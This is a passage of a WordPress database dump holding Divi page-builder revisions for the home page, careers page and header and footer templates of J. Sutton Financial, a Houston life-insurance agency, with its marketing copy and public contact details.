custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:31:47','2023-04-08 21:31:47','',138,'http://cmdev-site1.com/?p=877',0,'revision','',0),(870,1,'2023-04-08 21:23:30','2023-04-08 21:23:30','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"700px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||30px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu submenu_direction=\"downwards\" active_link_color=\"#FFFFFF\" dropdown_menu_bg_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_text_color=\"#000000\" mobile_menu_bg_color=\"#FFFFFF\" mobile_menu_text_color=\"#000000\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|phone\" mobile_menu_bg_color_tablet=\"#FFFFFF\" mobile_menu_bg_color_phone=\"#FFFFFF\" mobile_menu_bg_color_last_edited=\"on|phone\" logo_width_tablet=\"20%\" logo_width_phone=\"75%\" logo_width_last_edited=\"on|phone\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"221.9px\" custom_margin=\"-43px|||0px|false|false\" custom_margin_tablet=\"-43px|||0px|false|false\" custom_margin_phone=\"-10px||||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" dropdown_menu_bg_color__hover_enabled=\"on|desktop\" mobile_menu_text_color__hover_enabled=\"on|desktop\" dropdown_menu_bg_color__hover=\"#FFFFFF\" mobile_menu_text_color__hover=\"#000000\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" min_height=\"100px\" custom_margin=\"||-12px|||\" custom_padding=\"||0px||false|false\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">Planning for a <em>better</em> financial future </span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|desktop\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/products-services/\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|||150px|false|false\" custom_margin_tablet=\"|||150px|false|false\" custom_margin_phone=\"|||0px|false|false\" custom_margin_last_edited=\"on|phone\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_button button_url=\"/careers/\" button_text=\"Work for Us\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button=\"on\" button_text_color=\"#000000\" button_bg_color=\"#ffffff\" button_border_width=\"0px\" button_border_radius=\"14px\" custom_margin=\"|150px|||false|false\" custom_margin_tablet=\"|150px|||false|false\" custom_margin_phone=\"|0px|||false|false\" custom_margin_last_edited=\"on|desktop\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Thumbs-Up-Icon-No-Background-Hex-666666.png\" title_text=\"Thumbs Up Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"||||false|false\" custom_margin_tablet=\"|37px||89px|false|false\" custom_margin_phone=\"|0px||0px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" animation_duration=\"1250ms\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_padding_last_edited=\"on|phone\" custom_padding_phone=\"0px|0px|||false|false\" sticky_enabled=\"0\" width_last_edited=\"on|desktop\" module_alignment=\"right\" align=\"center\" always_center_on_mobile=\"off\" module_alignment_last_edited=\"on|desktop\" module_alignment_phone=\"center\" module_alignment_tablet=\"center\" width_phone=\"50%\" custom_padding_tablet=\"33px|1px||||\" width_tablet=\"70%\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h2><strong>Providing Premium Life Insurance Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" custom_margin=\"||10px|||\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-15px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>Want To Know How Much Insurance You Need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"1\" title=\"false\" description=\"false\" ajax=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(158,153,153,0.1)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Join Our Team!</h2>\n<p>J. Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" always_center_on_mobile=\"off\" sticky_enabled=\"0\" custom_margin_last_edited=\"on|desktop\" module_alignment_last_edited=\"on|phone\" module_alignment_phone=\"center\" module_alignment_tablet=\"center\" module_alignment=\"left\" width_last_edited=\"on|desktop\" width_phone=\"50%\" custom_margin_tablet=\"|||0px||\" custom_margin_phone=\"|||0px||\" width_tablet=\"70%\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-08 21:23:30','2023-04-08 21:23:30','',138,'http://cmdev-site1.com/?p=870',0,'revision','',0),(871,1,'2023-04-08 21:25:33','2023-04-08 21:25:33','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" parallax=\"on\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"67px||141px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][dsm_typing_effect typing_effect=\"Proudly headquartered in Houston, Texas!\" typing_cursor_color=\"#FFFFFF\" typing_background_color=\"RGBA(255,255,255,0)\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" typing_text_color=\"#FFFFFF\" custom_margin=\"54px|||||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][/dsm_typing_effect][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\" module_alignment_last_edited=\"on|phone\" sticky_enabled=\"0\" module_alignment_phone=\"center\" width_last_edited=\"on|phone\" width_phone=\"75%\" width_tablet=\"46.1%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">Info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#FFFFFF|dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" min_height=\"24.8px\" custom_margin=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"et_footer_layout\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/privacy-policy/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','523-revision-v1','','','2023-04-08 21:25:33','2023-04-08 21:25:33','',523,'http://cmdev-site1.com/?p=871',0,'revision','',0),(873,1,'2023-04-08 21:27:24','2023-04-08 21:27:24','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|tablet\" sticky_enabled=\"0\" width_phone=\"50%\" module_alignment=\"center\" width_tablet=\"50%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|phone\" sticky_enabled=\"0\" module_alignment=\"center\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" module_alignment=\"center\" module_alignment_last_edited=\"on|desktop\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-08 21:27:24','2023-04-08 21:27:24','',38,'http://cmdev-site1.com/?p=873',0,'revision','',0),(874,1,'2023-04-08 21:28:11','2023-04-08 21:28:11','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" custom_margin=\"||-2px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto|||false|false\" custom_padding=\"66px||66px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|desktop\" sticky_enabled=\"0\" width_phone=\"50%\" module_alignment=\"right\" width_tablet=\"50%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" hover_enabled=\"0\" global_colors_info=\"{}\" width_last_edited=\"on|phone\" sticky_enabled=\"0\" module_alignment=\"center\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" module_alignment=\"center\" module_alignment_last_edited=\"on|desktop\" module_alignment_tablet=\"center\" module_alignment_phone=\"center\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" parallax=\"on\" height=\"350px\" custom_padding=\"100px||0px||false|false\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-08 21:28:11','2023-04-08 21:28:11','',38,'http://cmdev-site1.com/?p=874',0,'revision','',0),(881,1,'2023-04-08 21:36:35','2023-04-08 21:36:35','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][/et_pb_section]','Default Website Template','','inherit','closed','closed','','528-revision-v1','','','2023-04-08 21:36:35','2023-04-08 21:36:35','',528,'http://cmdev-site1.com/?p=881',0,'revision','',0),(876,1,'2023-04-08 21:29:25','2023-04-08 21:29:25','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Header-Full-Color-2200x1028-2.png\" parallax=\"on\" min_height=\"100px\" custom_margin=\"||-45px|||\" custom_padding=\"23px||0px|||\" hover_transition_speed_curve=\"ease-out\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"|auto||27px||\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"et_header_layout\"][et_pb_menu active_link_color=\"#FFFFFF\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" logo_width=\"20%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" module_class=\"menu\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_font=\"||||||||\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" background_layout=\"dark\" module_alignment=\"left\" min_height=\"126.5px\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"||0px|0px|false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" active_link_color__hover_enabled=\"on|hover\" active_link_color__hover=\"#003372\" menu_text_color__hover_enabled=\"on|hover\" menu_text_color__hover=\"#003372\" theme_builder_area=\"et_header_layout\" logo_width_last_edited=\"on|tablet\" logo_width_phone=\"75%\" 